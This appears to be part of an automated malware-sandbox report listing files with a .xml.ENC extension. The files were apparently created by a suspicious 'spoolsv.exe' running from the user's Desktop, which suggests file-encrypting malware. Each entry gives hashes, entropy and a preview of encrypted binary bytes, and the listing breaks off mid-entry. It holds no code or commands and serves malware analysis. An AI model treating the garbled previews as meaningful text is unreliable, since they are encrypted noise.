                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.)..S?.{........_..0#(w`X..q....P.....K.!:...|....).N.8.d.........T.1....:#...v.-..d.v..O....5...K.w...3...V..n.f..I#62SH....5.%.i>.5.6+..K.....^......;....KuWZ,.v....?K...[r.BO.p..=........V.&..m.4...z...g.=J."....My?m......@...*+......K.._[ .!Dh...STXC/....&...a...uz.1.....P...tX.p.IV..K\i.uJ...p.{.,.....n..o.b........=..?.....,..._..y..7j`+c..WM............)..A...A.PC.r@...3n....d....)..l..hBT..2....I.+..x.>..._..fq....Rl..po......9.uD..4T8xX.d.....H.....`..D.!R6h..1L.....d..L2y.+f.[.. d.k.....ODrCZN....1n...1..k...c..k..U&V..J..bm...zT.?}s.1.|....,..%)b.n.w..7.:..<...b...U.g..(i.r.......gM..?.".G.,$.?.S8.c.[&/..F.......X/F.s...F...o.RBH.<.s"...........W.R...._....i.;.1.\../w..k.=0n1r.m...3((._..#R.c.GW(..3....8..If....7<e@..D:..4...K%6T..._.EP[Z...Ho?3...w.;);s/.5s........%T..l'...;$..T.h..l..m?W.].&.O"[i...i..........6..Oe...v$.f.2....q...j...&sQ.J..e...S...Gb.....xcG}.c.&.p

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700150v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.83265260059308
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/K50k9/ngt9w3VPZasfeF6yniEJ6txUQV3qqzQ+0BOoqpC+uo5zwOnBo4S:/K50k9/daF6xR7VhUdqpayB9S
                                                                                                                                                                                                                                                      MD5:86239ADE52E2D24AA9F02D23B6BD96FD
                                                                                                                                                                                                                                                      SHA1:F8E9A867365D80E501523E82036D3DC5C145B5BE
                                                                                                                                                                                                                                                      SHA-256:EEEFB21CB98A09458E1AE1B7CF42E4B78ED7530DE2C89880B23B43336E813E89
                                                                                                                                                                                                                                                      SHA-512:BEA646A788C95A9F600B425BECFA0C643EB40204BEE416DB819078B73D400B1BA3765F1AFFFAB25BA738AB1388F7C8A3CFA7B86C49CA4451616FFCD91756252E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.T..../(..{.%lE.=.K].C.QGkr.I...,&..,B^........<.1..A....%1h>....;?.Zox.Djs,..-.a. .G3.o.q!&.h....G....c..... .~......y.F.^Q._~n.Ee..u.>.V..&.O.E./..x.9.n..Ds...`.M..^.@I..>..}G.TxU.i.(..6........y.6.1.$.{*6...0..]EY[..z`......X..*...,....W.<..C...,],..T.H.ia.`.u......Sr...c.I..S.H.........j..P{d....@...~g.4..d?..lz.B..]... .|....S.64....a............s+0.w,&..!.7?....F...... GS.........."8.t&....\q..f._...d.6..H..-!.,Z..M.w.c.^.@.qT...... 8J.........u..p6#5Y..s...Jj...qe.=#.}..1af8dVO..S..}..y..Y..}..s.._..Xh<....s...+F:...5.'.B..>D.[...k.4.T}.......9.YBn22yy...2..(..K...;...."...>R.....[L..M....:...}wK.3.S.'.L.....oCBW4=T[..N.7....-..q.2..Jo..f./.D....u[..)..A.q.}.9..y.c..8........m...e....8..;...s.:..9...Te...".4+-.[...Uom..AB.Ll]..7Y.jL......lS....e*.!.@....."../...!..osNPcMM..rW.)....N.9..8.|....,..];..S.O*d..d...IA...0. .C.Q<D.~wk[....]....F..T.j..X.n..M3.O....)....L...g.*4>..d.Y.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700151v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.853916361600724
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/0RZwXNyULBFkWCphYiKFZvIwwh1k30++yoqJ684F9XmNACcar9KIZj1plHN:/WyXL3fOkFZvIweM0++vJ8I9X2AHi9K8
                                                                                                                                                                                                                                                      MD5:9D9136FC0E62C4E1678D247E27C675B1
                                                                                                                                                                                                                                                      SHA1:6DFF61C9B83743444A1422AB973B9FC40FEFC142
                                                                                                                                                                                                                                                      SHA-256:9A04ACE61843F25DDE7A2052822B053B5CA7941BE3294DD90040D7969B0755CF
                                                                                                                                                                                                                                                      SHA-512:6B631C0F84B8C260A8192A548CDC1EACB215F800A9FC88CDE2010011A59212F99C5C6A07DC6E56CB11DC8F81827A99401FAE6E2050347406292FAD4CEDAEAFDF
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.nj.%.=.....0G...1s..W..e.m.Lj.TLAYS...\.D...S...'R.P.....W..[..U..f"'ke.#E..q.g...)..jg!\..3.u.h....P.....\.....'.WD.b3.....;_....A.+Vc/.1/.h..?..A......qE.. F.S]. ...=.g...Mv.._..ta....$..Z..x.\b....T..B..1.\7-...B/....EA ..A..r...~../#..s*T............-.........0.R Y-....qGt.%3bv=......O...l..J.~^..W..d.J.]i.D...3..{.T.Z..J\.f,...xnZ.C.......'.[..Vq....`3...<..K.,Gxdqn..=.X.sY.=..9.,Lc.q... ..R..]...G.o/i.....v...O.U-%..!...stE.K.......n...K..x>M~.6.t.#%.'..T`Q.!".H.=..FD....O+....,AM.o.>..\....X..#....._.......|..B.A ..(8......m.S.6....{f.tv..">...\X...G.V..R...1.3...&J..LP.].n.0EL....-....k...>..wZ..;..K.+\.*...8....V..G.[xu.O2..#..wAj$.....D.'...n.....H."..`.*zp..V....i}.x^...t...F2...}@..Jx6\.}.Z..!ru...k.R..$f`...<....g.1R...F.S..i..(-.z../..h.6......n..&u.`ma.C..hi......o.q...''...f.m7.c...!5......)...m.J.h......i.%..v..|l..!&tS.%.Q..K.=.D.q.W( Rrz~......G>..6....B...[....J4.!..aV.-}...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700200v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                                      Entropy (8bit):7.8539525736950155
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/HrQH3s7GFYQPJyiQIuIYzk1z5EZ5IoPlrSCE8rZPV4enG13aKtJmGVKK5GzN9K:/EHc7GFYEEi5uIYz86bt+CEyPVjG9tIC
                                                                                                                                                                                                                                                      MD5:F8B8943E37A5EC3DDFE7F30A27A7DCA1
                                                                                                                                                                                                                                                      SHA1:917C9CCD12C2A8C2810D04F3ADC7428A6EEDE1A1
                                                                                                                                                                                                                                                      SHA-256:3DAFFCF51F1405E130222E7BDA84A52A89F8DD5CAA9CF7D084773F586F1E56DF
                                                                                                                                                                                                                                                      SHA-512:5ED6C18CE443EC73097AFF3C76E843DAB828C9A3D2ED904B64CAD9958E5874C5C13E7700AFE013F6B1F792A52D85FA16BBF72E0F5512B3440AEA97797D6F265B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.t.Y..x~|r{...;g..p..8.k&.B.......N,....|^.)6....f.B.FXQ..b(ELY.....<..\....o.S`...m.E..;N.1...............en,:.:8.....>aS....<{:;%..r..LMC.x...)e...aV...|~/..R..$...L.;E....L..p.......0.\......I..)>L..Z.........mt.9.\(RXsB...7.XO"..E......?~$.....fv3.84n{J.....^..A..T.o.<..x._.l?...`.+..&k..|....9C...........Pz3.Gx.[q\l.w..0rG.D.]U@...'.3.\..i...g.....H.R...\..%)...0f.|R...I...#iw ......lN_.M1..8o...Z......H.^.....Lb.q.Mg.:(Z.&h....o.../.K..o.i'.5.[.<...v.[CT.*.k..v.../......t!..0.<Jf...>,.o...7|......1....r........f...'R.3.x...s.x!..<@GCe.X.GN....\....|~1n^.._....5.5bT...k....Y~...4OIr.M.V.!gc..Y.,..H .JS].m.1..=.+;.m........je...F.'.G....k.@3W...-V....y1.E.....A....Z./,.A.&...v+h..j.p.)>%..>..'.QI...6.p{....B.f.ZR.!....rb..I..h.......w....>...{.*..(.@.....|^2...$.(wT...>..=......Wa..0.m.s....$..@..TYp...|...}...'..`.`..`9 .....4.6Y..^..@67.5_.Ch..u8...S%..K.........N<.u..J.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700201v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.861118289001494
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/LqBRSu9eA1GTJBjqHWrUkrJXEjuGOpXFm1KyZmEoN4O4tUXMUNdAi/k:/L6dQlKYUkdXEj2FAPZ4N4PJoAF
                                                                                                                                                                                                                                                      MD5:F0E50AC6AC14AD35D9241E41B2863CFC
                                                                                                                                                                                                                                                      SHA1:AC8FF869AE4C6F5F9E789E1945E14341A81FC9A2
                                                                                                                                                                                                                                                      SHA-256:7302DEA42DDEB0E77FF7F40724A06352F704E6A261DDD660258013258A7E65B1
                                                                                                                                                                                                                                                      SHA-512:04B736C54E0ABCC2360A28C3C76EEC28EBE2DEEE5E695AC063B27AAD4B4A93A81C672ACF950E6B13AB47E10CBE6411540E4F51A7D96C533F0AC427BA82F0430F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t......mvL....Oz.....D..k`..i..~\...{a.......>~%.vv..~q...dby.....Ou.Zlu.i.-*.:_j....._.oG...8\._..{D.........C.|(r=..;....fka..2.>.I.v...!..u5...}e..uZ0^t~.....ToQ...^.R..QS9..v .K.}....r.g..@...2;..{.[.G..o'j....2.I(+...J..B....!$Nm..b...Qs;e..w...B..KG.h.........7.._.w..{l..nO.uW.*..[....1u'Ec.....!Z...'..Y]..z.4....`.r|....N.)PJ(..E...G>3@..1+I...........xM -...d.sN...J........?.g`....]..q.0.*.......Y...N...?.@..j......d...._............p?nPy..DT....3,gN$q.dc...hU........h....\oI%y:.SP/.V..f7;t^.?.W.m-3..B<.O..b.'..*...Uv..8~..>u.9.<t:B...|..L[+..T...2U2;.H.]...iR......N....8.`..V.c..C.[.4..m...[#.l...7....n.N..0!.0;..)`]...0...2^z.j....g.Y..N.(.....?..8...0(0../.1/%%M/B{e.)NnT.2..........g.\.Zv...R......wF%.X y.Ky..-xX..,HH.fi~.......$s.'.Ft....q..(7#.zG.....6!.....a.b........[.^.h...ppi^.M...<...FW.F.+Kb.@K...m....'x..$ ../.P..(.<.z.,...N.~...F^Y....Z.N......S>..r-...1.m...%

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700250v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                                      Entropy (8bit):7.834076512088911
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/lEGt2hL/EJkxO0n1Q2Al4BwrjtEXw49WAJOW9EidAMrtqddLbuQX0K6hmi6T5:/5EY0niygxPeJ2hVX0dmi45
                                                                                                                                                                                                                                                      MD5:5C478641E7F5FBBC2E9A718114979A11
                                                                                                                                                                                                                                                      SHA1:3C3357EAD391B917DA87DDC0B04226BDDA59EFDD
                                                                                                                                                                                                                                                      SHA-256:8153B107B83F49777B0F460EB3F3C279286DE01116147EE5C3540D5A8A9FF8A0
                                                                                                                                                                                                                                                      SHA-512:D59A0E5DFF6CD44055FCF48E98006426714888D57C1854D455565F706E1022288670CC054620820AE74AC28A222E0E99699FA0FDC6356004AE3C179242D9E01D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..>....W#.....#../....|.^................Q.X..QY?jS.....z.Oq...Z3...Z.....e4I=....I_.+.%8Z[]{..v.I.z..g......\oGuK'...6.. O....Q.%..<...G..Z..Ei.~...s.Ej.....H..p.~=z?....]o.....,...Zcd.9....].fFH.3[.....0...g....C(...9. 7.$^.....t(.z..tT..p.....wh..~...43gj).p.x.yCd....g..V.s...f5....2Y#....s......s.%...8.^.K....................`0..`.MR._.N....!..Hdq72.7.....^.}./J............}M.[.........Dr?......E...j...b?.PVY.Gl/tL.G.....i.....u...(2r..#.+.M....a.S.G%..hv4..*l...8.......\.Hy.+..W.x/....&.N.pVp...=?.h{;.$.....T.E.`]..l1....3%..nE_.^..jPd..$.r....:..p..D..o......Jk.d...l...D.\s...<....."O..^m.k.<O.%.....Ly.^=...Q"}....?..g_dTB.d.fl#..+oeJ-......D....b2....)..#x...wI....lP..G..=h....%.V.....%.r}...}..x..0..ejB.{Y.mC0Kh..).|+.L..Q.r|.4......6b.&E....q.@.?d..N.W....pZn*.^s.VG..K..\._mx..M|.....<"m.P(Q.M(L....nC.R.;g%M.p.pl..x..f..0U...g'.D.d....T............~....R.~.k....K'.....e

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700251v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.857524536000387
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/QbKcNByLbe9vuK7JKqpKhHObL6piW6ERiVznluye8YAyahsLOmv/HStL1qS/:/yKcNmExEqpKpsLyB6ERit0wYA3mLOm4
                                                                                                                                                                                                                                                      MD5:6223FD08E7FD0E3AA5D120AD90638E0D
                                                                                                                                                                                                                                                      SHA1:CFA89CB6627272AC5CD08D752CDD5C70267F4273
                                                                                                                                                                                                                                                      SHA-256:3C4A8E71F88A8F2C822DE28DE99A6461FF882FE5B58B2661B7881FC2D73FD4E8
                                                                                                                                                                                                                                                      SHA-512:8231C7019F736248BD2515A5C510F84381D7E692587355896D3773503AF801B7C69DE3CEE7657B1518547270FDD12CC6D79567E31F6A520638C7F396EC495335
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t......|u. ...7.Y(..H..../F.!F.q..D.".j.K.y...w....F.7]n.Q...el../.g.V...{..R...^.$.u..kt..g..<6/....t..pHs......,.........S..<3/.zd.....x9.0.f.65.=.F...ESeMk.[B..7.r...nP....&...k+N?.S30...........4.._.."K7P.Q..b.fV.<.T.4Y.,vy.. .M....z...Xu....S...Xo2...g.+HG.8r."..J...EY....|u..0....;...#..z...`4....~..h..(7.s....E[..y..._\.*{../fA.Rr...:.....P])..F3.n.R/..J :..........XP..?b.~ ..).A..q.)!..^..`LX.N....w.TS./CJP....]..... `..L.K.5...7...z..1M...K..........#.....$.Ic.x.....t....y.!r.:|....)?....K.X...Jp.V[.1..._.D3..%Z\.......R..{x. s7m.ETL... ..(.{6..q..B...>S0!.1m....;-.....u...D...-M0I.H....!. .b.,d.....hD....XEF..$.f3......'G...\.....d..F...h.3[.V^.. .^U..?x..9V..n(..dG.+Z2.9D..Y+}Cu_[....O.4....)l.*J.LO...0.gJL..6.;J.,<...n).....:8.....0.k...J........p.X........9.:....0.U.Z.[.n.....A.vl.\<..|.5....F.[\...364.20.8Z..b.q..l..q#.I.pN....j....Y>....G......."......E........f...W....n|..1...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule70025v2.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2896
                                                                                                                                                                                                                                                      Entropy (8bit):7.930054378851148
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:+hhDPptENobH/gX6n1q4HYtFpgNYeTRUUE6bgVbCjjzJu4QmpILkHW3iPrDSUVV8:+XDPpSmfXntHYtFpJA8QgbCjhu18Kk2V
                                                                                                                                                                                                                                                      MD5:3AF8E4C7A8F41977D99C150A3D1894EB
                                                                                                                                                                                                                                                      SHA1:90C884581A482B111C7E041DCCAF77EE80FF5D6E
                                                                                                                                                                                                                                                      SHA-256:17A0DC5434B55CEFC360F0CD2A1E64207A4567EC3F26412ED2ED57257AA722F8
                                                                                                                                                                                                                                                      SHA-512:700F031A6E577EAA22D42FAEDF990C924B2F385AFE71B5FD1F8785B9C1DCAAE4AF367B073534E6B96AC583B3492E1E8589475EE0CDA0424ED05F259D59DC0493
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.....=.._.x.G...........a..:........".......V}......s.....5/x.fL&7.....5J.........U.,.*.....D...\...(|...V....E.t<.$......X...*@..e.AS7......./......!.$.}....._.....~j.1&.\...k]..Q.%!.-e.F.F1...e.5..f.0XR...D..xU,.......9...A$*.Le.+..'Jx...E....*.x..~..t..(H...C$ .;.I....G...mh...k.o.No;.M...~.."..So..J.....s../..`v;9%..{... ....G......g...n...c~fG.~..p......S.4....M!..>9..G..J.5.....t..R..........(&.n...w..7Xo/R5..[Ac.`.l.u...i3..;.,..<......'...)..;...:.?.|.e...Q..(..m..s.....x.Cj......e;/..B(.}`R....P6..#!`..`.Rt..k...l....8.v...\......V.....Y3..?.._.;. h4.S....b....r.....o..6...'.........(..~.a..7....HP$..)lSv....1.k..(.....c.].^.WIO\..Nx.:/.@7.()";.`."...)..:+.f...'..8...`.Pv.......W...v.4....A..?..+..8..yC....<y....I..7{....}...n...(.Z.....?W.!&>.1.0>.....]....O.7q....eLS.{m..;|..t.......]...W.U.>..j.k.. >vd}L.t..t.........(.%.SH...K'-h...<..u...`..s..x]..+<=l....+.MO.h....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule70027v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):528
                                                                                                                                                                                                                                                      Entropy (8bit):7.55706181852594
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:fmg9NGR0KW3SpcpOqFGSgIAtw0gFsTxDupQ6vvIi:+iKWscpOGGSg/dgFMN6Ii
                                                                                                                                                                                                                                                      MD5:9B76C06EAD9FF4AA00BA2C883E8B992D
                                                                                                                                                                                                                                                      SHA1:5EB4AF6C11893B93CCB52B948ED36908656A1483
                                                                                                                                                                                                                                                      SHA-256:43E84C788264A74E8BF819E6321126AF894C93EBAE8CF2F9FC4A82C0C5B15F81
                                                                                                                                                                                                                                                      SHA-512:FBF88106F204E40E69C555541469D351ACB0215882E540BDD4D31F9445A4671BFAB7F19C9F1FACA9D3A9F767F0F11D0E810D4C1D0F5A9352AE6AA778CED62332
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F.{......!....vN...T..+...v.DU6.i.7....@..?.h...d6.3+..`./.G.4..6.{U..G\|...#].Y.T...........Y.u......*...+.$8..b...M.|.g..H.&..4@.....9..._C...v8e.....=......f....X+..41......{t}.*.Y.V..{...l.h).z.v.?..D.M^....mvl.ikN...A.i.!l9)|...M.!....%?..Eu..{.BE.<.Bt..D.d._.m.-".0............_^^.......4i........Uh.....#.....R*.I./E.......l.0...........6f.2b..4f.R.u).n....9..c...E.~.\?K..nT\k...7..~.+..Y......hK..V....o.2.....M.....`...|.3..7...$...A...C..FkTV.U..S

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule70028v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):880
                                                                                                                                                                                                                                                      Entropy (8bit):7.792965882198758
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:fmhhS+8UbiQLFA2h2UNJFvKuwS+7D7c6MSBj+jMrKqvDPZFNTb7ci3kjuTqADjNd:+SUbNRb0ZPQD4vVFNXwiSuTcnc
                                                                                                                                                                                                                                                      MD5:817A1730E03E49E9238B8B9AD4AF2044
                                                                                                                                                                                                                                                      SHA1:63737CDDB1CC9B87DC6DF5D97C8169110BACBCD8
                                                                                                                                                                                                                                                      SHA-256:265BDB73C6DAED16C4FD3BA7BE52769141EC0794B277D3AE9A2B1C836A5031CF
                                                                                                                                                                                                                                                      SHA-512:0B668D0768F3524D9A60937AE34B8872365ADA971BFA6D08B4E09D4168E1DF8C47AB032D6BBF88D2F8317724BF2F407DB06F6EB227B3B4805C5325ECE4E6E466
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F....%.l..C1p<2y.h.is8k......%c0U.}5q{s.?.F......J..o...~...|...a<....[.R.H.......E...1.......p?..~!....4....w.#[...o..!...=..z..N...~...K.IS...y.3..............^.S..^~.x.g.h..................b..`U..a..1...&I.t.[6..vM{...?....N=.LlV'?.@\R7.W.U..b.6.>...8...6.I.<.mr..Vn%.MI.*P.....F.|j3.......^.%.....;..%..3.\.?E*\.i..y.l.o......hCOn..9.v...U3..Kr4t...W6.-.H./....m..S..!S.p...<..7........!.........q6....X.<.8....`0..zb.M.0L....(.q.mU.+>.Ap..qG..Z..;.v..o.z...%A.....N....m,...E.NO..~......g....e.z......EA....D.,....h8.P.ypR .....HX...........A.....d.1I.|.}.u..!......D...eQz4..S..}...~...=...D...E.O....G...w.......:.d!.}...\.|.......vjZ.c.Y.....2#du..k...U...7 ..t.....A.;..6c.z.f...."..qg.r..v.PZ}l!)......r.N....3...p.M........;A0..\'......I.=$..(.=x.....abpN.NQ.....8.....z.!;..n.9H.n&b.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule70029v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):672
                                                                                                                                                                                                                                                      Entropy (8bit):7.692550516640362
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:fmI8Q1sMEht6ilVlR43coS06WsGkzzbmt7Z4nHbPFzdpeWh9AqOKuyOv794iXTp1:+I8MsXP6i/Mco5sGkvbmR+nHb17eWAqk
                                                                                                                                                                                                                                                      MD5:455093FE15BBD9E1B32EC518C0BAAA35
                                                                                                                                                                                                                                                      SHA1:7995A386F51915BEF91CDF899B7EE333E9916A33
                                                                                                                                                                                                                                                      SHA-256:CA26D593AF47714BF4F2AB395ADFB004CA81A922C4D27F7B84E82D9EE29CB3BA
                                                                                                                                                                                                                                                      SHA-512:B287FC32CCB41CADF33B608A5B98EE959113B0E950BDC09350389766BC79401211ABB3FC10C86DB73E826B503B8970425CBF64E855AAF10D3685A2A330984259
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..Q.D_.=.LE...-.F...y_.R.uD..\]........0....6.....7.l....Xd......5...$..?..}..]...&...@;.Q.i....%..`,~.A....c..p6...nw..m..w}......q..1.O.6.H.x.O:.Ucs....O......z.....<.^..5.......$}..9.?f.,....u.....4...F.x.{.h...J.#/.Vi7..iH$G.9.2.~......X.nu"..O......^Q):p.../...'~X|...p....C.x(.I.z....T.!..L.+.......ww...E?.BE...+.uEp............GK5...7.WOm.(.^.....)i....Qw...LD...uj7.y...o...`}.T..X...G'.a...Q...&.WV...I.0u...].6.....|...I...D.SDxw+;.Lf..{?..i{`....*.v...8.Z.z....{..k&......i..........+~..b....A.B.6...i.x....=.y..OUG.~t.$^.5.X..Z...-.....P.N.z.9...~CsF.e.6f3...(d*.=.L ..g.Q..CU.A6...w.V..2`6.....j.........

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700300v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.84069144811021
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/ybjwALOj9Vjgq05i5D+68ZMlURFdpCkx84bhV+aIDjrSs/efyq9VkqLtZ9/bdv/:/sTO7c5i5B8oURBCkx8mdSr/CkqLvhd/
                                                                                                                                                                                                                                                      MD5:C80983A0E6ACDC3E9086A7CB39CF930D
                                                                                                                                                                                                                                                      SHA1:45F6354FB2C40C33D5F1BBEB236F246038EE2E6B
                                                                                                                                                                                                                                                      SHA-256:E754C7DAA904B402DD76CAE43FE5F3760DF4BDD681F2E8DE3C4DABF21687C1CA
                                                                                                                                                                                                                                                      SHA-512:44DD55A7F06D541E4CD02DDC725A984D4015003E2BE9E8BD894643B15DE4303756CE7AD077B76DE1A24AE005A702DAB63E76C8357AAD06F20F0F254A95FB9DC9
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t....G...#.^k......Od]....k2...#...7.#qx.8...W..>...-W...u{...G.c)V..%...P.....>q3..l3....._.."'..XA@.p.)7WZ.d.*....;. ..B..:f.i`*.>...... .M.......m.A0.y.Ds....Ko..].)..._..k."].=..r...W...L$.2.[ed.S}=.HJ<#.>.F...F.../.Pd.P..G.!E....AfT..f+o..-NQ..o..+o..P..gx....'......U.4.O/R...3...C.'..T....B...).*.+....D...6....x.....Z..-......U$.p..UYz.W....../.:.S?..-.!"..emI..$..&...*..6....N..0P......Lx;.rN..M.....|,......|6.q.....;%9.&.v....[...F.U..'.D........F..u.........b..r......m.....6.U...0..q.Oy...S....|."...../.-....e...1...<...3....*(G!.k.b.:....99...A.\?j...@.....eD].T.C..:...@..1.Bh{..{.p.*0u.".......KUd...1..>..;@..ae....+b.;\._....>.<.B..:.:.W..V..u..e....H....:H9.*.e.E5._..Xm...&4g.f...B..2.m.l@...p.-P|.W.w...zP4+..K..{.5n...4.l.~^y....F.r.\......P./.....Iet0..#..sM[.w._....-r..........!"."Un.;......X...Am.B.8.&.I.!,.G..N./..a..*.)R...].r.P....&]E.Z........w..{..+U`...}@...N..nY...xQ.Sc.7]..'

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule700301v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.864930200523527
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/XEYJmQrawCHm6xj4BJ3FLqIF0jD5uSOYjdUlmlDhNfjPNjKGsN7frKbS:/XEYHpTuN4kdUlWhNfxjKb7fWW
                                                                                                                                                                                                                                                      MD5:942B3E5CAA4E19D6743D7C859CB40C8B
                                                                                                                                                                                                                                                      SHA1:49137B8C96B41307F5374DAE89754512EC310CAB
